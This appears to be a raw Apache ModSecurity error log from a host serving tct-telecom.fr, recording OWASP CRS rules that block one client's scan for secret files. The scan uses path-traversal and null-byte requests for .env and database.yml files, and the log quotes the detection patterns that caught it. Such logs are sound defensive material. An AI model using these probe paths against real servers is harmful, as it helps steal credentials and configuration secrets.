[Tue May 12 04:50:53.870925 2026] [security2:error] [pid 1820198:tid 1820214] [client 93.123.109.165:30054] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVjc1tk6y7yBJLpJos8QAAAI4"]
[Tue May 12 04:50:53.871089 2026] [security2:error] [pid 1820198:tid 1820214] [client 93.123.109.165:30054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVjc1tk6y7yBJLpJos8QAAAI4"]
[Tue May 12 04:50:54.291146 2026] [security2:error] [pid 1730207:tid 1730210] [client 101.32.128.28:48548] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/uploads/2019/08/bouclettes.zip"] [unique_id "agKVjjue9Sp-pIv_Bb636AAAAUE"]
[Tue May 12 04:50:54.318875 2026] [security2:error] [pid 1730175:tid 1730192] [client 93.123.109.165:29990] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjXo6NvB9WXx5V-6huwAAAQ8"]
[Tue May 12 04:50:54.360738 2026] [security2:error] [pid 1825179:tid 1825221] [client 93.123.109.165:30066] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agKVjtr1yOh9TvizeziStQAAAFc"]
[Tue May 12 04:50:54.360864 2026] [security2:error] [pid 1825179:tid 1825221] [client 93.123.109.165:30066] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agKVjtr1yOh9TvizeziStQAAAFc"]
[Tue May 12 04:50:54.646638 2026] [security2:error] [pid 1820198:tid 1820214] [client 93.123.109.165:30054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjc1tk6y7yBJLpJos8QAAAI4"]
[Tue May 12 04:50:54.753956 2026] [security2:error] [pid 1825179:tid 1825221] [client 93.123.109.165:30066] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjtr1yOh9TvizeziStQAAAFc"]
[Tue May 12 04:50:55.221884 2026] [core:error] [pid 1808852:tid 1808864] [client 93.123.109.165:30078] AH10244: invalid URI path (/../.env)
[Tue May 12 04:50:55.923373 2026] [security2:error] [pid 1825287:tid 1825304] [client 93.123.109.165:16280] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVjwgpmE1yW0glLdghpgAAAMA"]
[Tue May 12 04:50:55.923455 2026] [security2:error] [pid 1825287:tid 1825304] [client 93.123.109.165:16280] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVjwgpmE1yW0glLdghpgAAAMA"]
[Tue May 12 04:50:55.923566 2026] [security2:error] [pid 1825287:tid 1825304] [client 93.123.109.165:16280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVjwgpmE1yW0glLdghpgAAAMA"]
[Tue May 12 04:50:55.940779 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:16268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/public/.env"] [unique_id "agKVj3o6NvB9WXx5V-6hvgAAAQQ"]
[Tue May 12 04:50:55.940918 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:16268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/public/.env"] [unique_id "agKVj3o6NvB9WXx5V-6hvgAAAQQ"]
[Tue May 12 04:50:55.943283 2026] [core:error] [pid 1730207:tid 1730214] [client 93.123.109.165:16276] AH10244: invalid URI path (/.%00/../../.env)
[Tue May 12 04:50:56.322195 2026] [security2:error] [pid 1825287:tid 1825304] [client 93.123.109.165:16280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjwgpmE1yW0glLdghpgAAAMA"]
[Tue May 12 04:50:56.325179 2026] [security2:error] [pid 1825179:tid 1825204] [client 93.123.109.165:16326] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVkNr1yOh9TvizeziSuAAAAEY"]
[Tue May 12 04:50:56.325371 2026] [security2:error] [pid 1825179:tid 1825204] [client 93.123.109.165:16326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVkNr1yOh9TvizeziSuAAAAEY"]
[Tue May 12 04:50:56.344277 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:16268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVj3o6NvB9WXx5V-6hvgAAAQQ"]
[Tue May 12 04:50:56.360474 2026] [core:error] [pid 1808852:tid 1808863] [client 93.123.109.165:16292] AH10244: invalid URI path (/assets../../../.env)
[Tue May 12 04:50:56.366646 2026] [security2:error] [pid 1820198:tid 1820220] [client 93.123.109.165:16306] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVkM1tk6y7yBJLpJos8wAAAJQ"], referer: https://tct-telecom.fr/.%00/../../.env
[Tue May 12 04:50:56.381680 2026] [security2:error] [pid 1825287:tid 1825310] [client 93.123.109.165:16310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agKVkAgpmE1yW0glLdghqAAAAMU"]
[Tue May 12 04:50:56.381805 2026] [security2:error] [pid 1825287:tid 1825310] [client 93.123.109.165:16310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agKVkAgpmE1yW0glLdghqAAAAMU"]
[Tue May 12 04:50:56.722920 2026] [security2:error] [pid 1825179:tid 1825204] [client 93.123.109.165:16326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkNr1yOh9TvizeziSuAAAAEY"]
[Tue May 12 04:50:56.761112 2026] [security2:error] [pid 1820198:tid 1820220] [client 93.123.109.165:16306] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVkM1tk6y7yBJLpJos9QAAAJQ"]
[Tue May 12 04:50:56.761288 2026] [security2:error] [pid 1820198:tid 1820220] [client 93.123.109.165:16306] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVkM1tk6y7yBJLpJos9QAAAJQ"]
[Tue May 12 04:50:56.782608 2026] [security2:error] [pid 1825287:tid 1825310] [client 93.123.109.165:16310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkAgpmE1yW0glLdghqAAAAMU"]
[Tue May 12 04:50:57.150393 2026] [security2:error] [pid 1820198:tid 1820220] [client 93.123.109.165:16306] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkM1tk6y7yBJLpJos9QAAAJQ"]
[Tue May 12 04:50:57.448607 2026] [core:error] [pid 1825179:tid 1825218] [client 93.123.109.165:16342] AH10244: invalid URI path (/assets../../../../.env)
[Tue May 12 04:50:57.449403 2026] [security2:error] [pid 1820198:tid 1820212] [client 93.123.109.165:16384] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/www/.env"] [unique_id "agKVkc1tk6y7yBJLpJos-gAAAIw"]
[Tue May 12 04:50:57.449594 2026] [security2:error] [pid 1820198:tid 1820212] [client 93.123.109.165:16384] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/www/.env"] [unique_id "agKVkc1tk6y7yBJLpJos-gAAAIw"]
[Tue May 12 04:50:57.485653 2026] [security2:error] [pid 1808852:tid 1808866] [client 93.123.109.165:16386] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agKVkRfeipD4uoG21FolXAAAAAs"]
[Tue May 12 04:50:57.485800 2026] [security2:error] [pid 1808852:tid 1808866] [client 93.123.109.165:16386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agKVkRfeipD4uoG21FolXAAAAAs"]
[Tue May 12 04:50:57.845789 2026] [security2:error] [pid 1820198:tid 1820212] [client 93.123.109.165:16384] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkc1tk6y7yBJLpJos-gAAAIw"]
[Tue May 12 04:50:57.863086 2026] [security2:error] [pid 1808852:tid 1808866] [client 93.123.109.165:16386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVkRfeipD4uoG21FolXAAAAAs"]
[Tue May 12 04:50:57.877043 2026] [security2:error] [pid 1825179:tid 1825215] [client 93.123.109.165:16356] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVkdr1yOh9TvizeziSvQAAAFE"]
[Tue May 12 04:50:57.877105 2026] [security2:error] [pid 1825179:tid 1825215] [client 93.123.109.165:16356] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVkdr1yOh9TvizeziSvQAAAFE"]
[Tue May 12 04:50:57.877243 2026] [security2:error] [pid 1825179:tid 1825215] [client 93.123.109.165:16356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVkdr1yOh9TvizeziSvQAAAFE"]
[Tue May 12 04:50:57.881655 2026] [security2:error] [pid 1730175:tid 1730188] [client 93.123.109.165:16378] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVkXo6NvB9WXx5V-6hwwAAAQs"]
[Tue May 12 04:50:57.881811 2026] [security2:error] [pid 1730175:tid 1730188] [client 93.123.109.165:16378] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVkXo6NvB9WXx5V-6hwwAAAQs"]
